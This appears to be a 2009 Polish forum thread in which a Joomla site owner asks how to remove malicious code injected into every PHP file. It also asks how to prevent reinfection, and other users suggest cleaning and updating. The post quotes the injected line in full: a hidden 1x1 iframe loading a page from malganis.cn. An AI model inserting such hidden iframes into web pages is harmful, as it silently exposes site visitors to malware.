PDA

Zobacz pełną wersję : Złośliwy kod w każdym pliku



GepettoPL
30-11-2009, 19:34
Sprawa wygląda następująco:
jest to już kolejny atak na moją stronę, wszystko wygląda jakby to robił jakiś cholerny automat.

W każdym pliku php (a jak sami wiemy w joomli jest tego multum) mam taki oto kod

<iframe src="http://malganis.cn/in.cgi?2" width="1" height="1" style="display:none;"></iframe>

kiedyś był inny, ale teraz to i tak nie ma to znaczenia. Czy znacie jakiś sposób aby pozbyć się tego wszystkiego (błagam, tylko nie piszcie, że ręcznie) oraz jak się ustrzec takich sytuacji na przyszłość. Dostawca hostingu to ovh, zmiany haseł, całkowite czyszczenie kont ftp( przez dostawce) nie pomogły, i jest to już kolejny atak.
Z góry dzięki za info jak rozwiązać problem.

adres do mojej strony flyrc.ovh.org

big_krzysiek
30-11-2009, 19:49
teraz masz blad na stronie...
dostawca ovh, chociaz darmowy..ale jak na darmowego ok...

problem tkwi prawdopodobnie w twoim kompie lokalnym...:
przeskanuj go i usun trojana, o ktorym jest glosno, zrezygnuj z tc, nie zapisuj hasel w pamieci ftp-a...
a reszte ...dobrze dzialasz....

GepettoPL
30-11-2009, 20:06
Komputer skanuje co kilka dni i jest czysty (bitDefender 2k10) korzystam z pajączka (TC już dawno poszedł w odstawkę)

błąd na stronie jest to odnośnik właśnie do tego kodu....

trzepiz
30-11-2009, 20:32
no to zaczynaj ręcznie usuwać albo skorzystaj z dobrodziejstw systemów *NIX-owych gdzie możesz sobie napisać skrypt który wykasuje ci zawartość <iframe> ze wszystkich plików. Metoda jest dobra pod warunkiem, że nie używasz nigdzie <iframe> dla swoich celów.

przede wszystkim, po ukończeniu usuwania kodu przeprowadź aktualizację wszystkich modułów komponentów no i oczywiście samego CMS Joomla! jeśli nie masz jeszcze najnowszej wersji.

GepettoPL
30-11-2009, 21:48
Masz może gdzieś gotowy skrypt wymagający co najwyżej niewielkich przeróbek, bo jeśli o to chodzi to jestem totalna noga?

trzepiz
30-11-2009, 21:51
skoroś noga .. to jak chcesz wykorzystać skrypt o działaniu którego nie masz pojęcia na systemie którego nie posiadasz ? ..

ręcznie kolego :)

poza tym, nigdy nie sprawdzałem owego rozwiązania, więc ciężko mi mówić o jego pewności i skuteczności. Wiem tylko, że bez problemu można wyciąć ciągi znaków wykorzystując do tego konsolę np: w Linuxie

big_krzysiek
30-11-2009, 21:52
poszukaj programu pspad editor lub textexchange..jest tam opcja wyszukiwania i edytowania wpisow...

GepettoPL
30-11-2009, 22:35
poszukaj programu pspad editor lub textexchange..jest tam opcja wyszukiwania i edytowania wpisow...
Sciągnąłem tego pspad i wszystko git :) dzięki wielkie :)